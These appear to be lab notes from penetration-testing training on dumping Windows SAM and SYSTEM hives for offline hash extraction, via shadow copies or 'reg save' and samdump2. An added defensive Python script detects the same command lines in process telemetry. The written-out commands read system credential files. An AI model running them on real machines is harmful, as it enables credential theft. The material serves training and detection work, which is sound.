Shadow Copy

1. Run:
   wmic shadowcopy call create Volume='C:\'
2. List the created copy:
   vssadmin list shadows
3. Copy SAM out (change based on step 2):
   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam
4. Copy SYSTEM as well (change based on step 2):
   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
5. Extract hashes on Kali:
   samdump2 system sam

Reg save

1. Copy SAM:
   reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
2. Copy SYSTEM:
   reg save HKLM\system C:\users\offsec.corp1\Downloads\system
3. Extract hashes on Kali:
   samdump2 system sam
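
Seen from the defending side, both procedures above leave recognizable command lines in process-creation telemetry (for example Sysmon Event ID 1, or Security 4688 with command-line logging). The following is an added example, not part of the original notes, that matches those command lines and rates a host high when both SAM and SYSTEM were exported; the rule names, host names and sample events are constructed for illustration.

```python
import re

# Hive name must end the path token, so HKLM\system\<subkey> is not counted as the full hive.
HIVE = r'(?P<hive>sam|system|security)(?=\s|"|$)'
RULES = {
    "vss_create_wmic": re.compile(r"\bwmic(\.exe)?\s.*\bshadowcopy\b.*\bcall\s+create\b", re.I),
    "hive_copy_from_shadow": re.compile(
        r"HarddiskVolumeShadowCopy\d+\\windows\\system32\\config\\" + HIVE, re.I),
    "reg_save_hive": re.compile(
        r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\" + HIVE, re.I),
}

def classify(cmd):
    """Return [(rule_name, hive_or_None)] for every rule the command line matches."""
    hits = []
    for name, rx in RULES.items():
        m = rx.search(cmd)
        if m:
            hits.append((name, (m.groupdict().get("hive") or "").lower() or None))
    return hits

def triage(events):
    """Per host: rules that fired and hives exported.
    SAM together with SYSTEM is what offline hash extraction needs, so that pair is rated high."""
    hosts = {}
    for ev in events:
        for rule, hive in classify(ev["cmd"]):
            h = hosts.setdefault(ev["host"], {"rules": set(), "hives": set()})
            h["rules"].add(rule)
            if hive:
                h["hives"].add(hive)
    for h in hosts.values():
        h["severity"] = "high" if {"sam", "system"} <= h["hives"] else "medium"
    return hosts

# Constructed sample events (not real logs); hosts and output paths are placeholders.
SAMPLE = [
    {"host": "WS01", "cmd": r"wmic shadowcopy call create Volume='C:\'"},
    {"host": "WS01", "cmd": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Temp\sam"},
    {"host": "WS01", "cmd": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Temp\system"},
    {"host": "WS02", "cmd": r"reg.exe save HKLM\sam C:\Temp\sam"},
    {"host": "WS03", "cmd": r"reg save HKCU\Software\Example C:\Temp\example.hiv"},
]

if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE).items()):
        print(host, info["severity"], sorted(info["rules"]), sorted(info["hives"]))
```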